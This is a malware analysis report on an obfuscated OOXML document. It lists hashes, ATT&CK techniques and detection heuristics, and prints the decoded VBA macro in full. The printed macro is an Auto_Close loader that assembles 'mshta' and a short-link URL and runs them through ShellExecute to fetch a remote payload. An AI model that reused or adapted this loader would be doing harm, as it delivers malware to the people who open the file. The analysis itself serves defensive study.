Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 98e79d776f8add7f…

MALICIOUS

Office (OOXML)

8.2 KB First seen: 2021-06-04
MD5: cc6bf097feb1215656d394742337a2d8 SHA-1: de7fbb17ebe45e1c5e0666a9779bd936a4578e1c SHA-256: 98e79d776f8add7fea7053ad55c473b5b4b6234c29318f7c614b48b4a063fba0
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The OOXML file contains heavily obfuscated VBA macros, including an Auto_Close function designed to execute automatically. The script reconstructs a URL, "https://j.mp/adsfljsdahidfhijdvkddskwij", and uses GetObject and shellexecute to download and run a second-stage payload from it. The renaming of the VBA project part and the obfuscation techniques suggest an attempt to evade detection.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/yuiopfghjkl.bin)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    = _
    GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
    : MsgBox "Microsoft Office not Installed"
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    = _
    GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
    : MsgBox "Microsoft Office not Installed"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Function _
    Auto_Close _
    () _

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1109 bytes
SHA-256: c8e43c59981e80359304f4755b7dc964cc85d32a31672684985c09bbb710cfa0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Function _
X _
() _
As _
String
X _
= _
"M"
End _
Function
Function _
Y _
() _
As _
String
Y _
= _
"s"
End _
Function
Function _
Z _
() _
As _
String
Z _
= _
"H"
End _
Function
Function _
D _
() _
As _
String
D _
= _
"T"
End _
Function
Function _
E _
() _
As _
String
E _
= _
"a"
End _
Function
Function _
L _
() _
As _
String
L _
= _
"p"
End _
Function
Function _
K _
() _
As _
String
K _
= _
"j.mp/"
End _
Function
Function _
T() _
As _
String
T _
= _
"adsfljsdahidfhijdvkddskwij"
End _
Function
Function _
F _
() _
As _
String
F _
= _
"H" _
+ _
D _
+ _
D _
+ _
L _
+ _
"://" _
+ _
K _
+ _
T
End _
Function
Function _
calccc _
() _
As _
String
calccc _
= _
X _
+ _
Y _
+ _
Z _
+ _
D _
+ _
E
End _
Function
Function _
Auto_Close _
() _
As _
String
Set _
alsoasld _
= _
GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
: MsgBox "Microsoft Office not Installed"
: alsoasld _
. _
shellexecute _
calccc, F
End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/yuiopfghjkl.bin 18432 bytes
SHA-256: 432943052509a7be2ba31310db1893c36b3ad9d6cd143e2945b42df6659affbd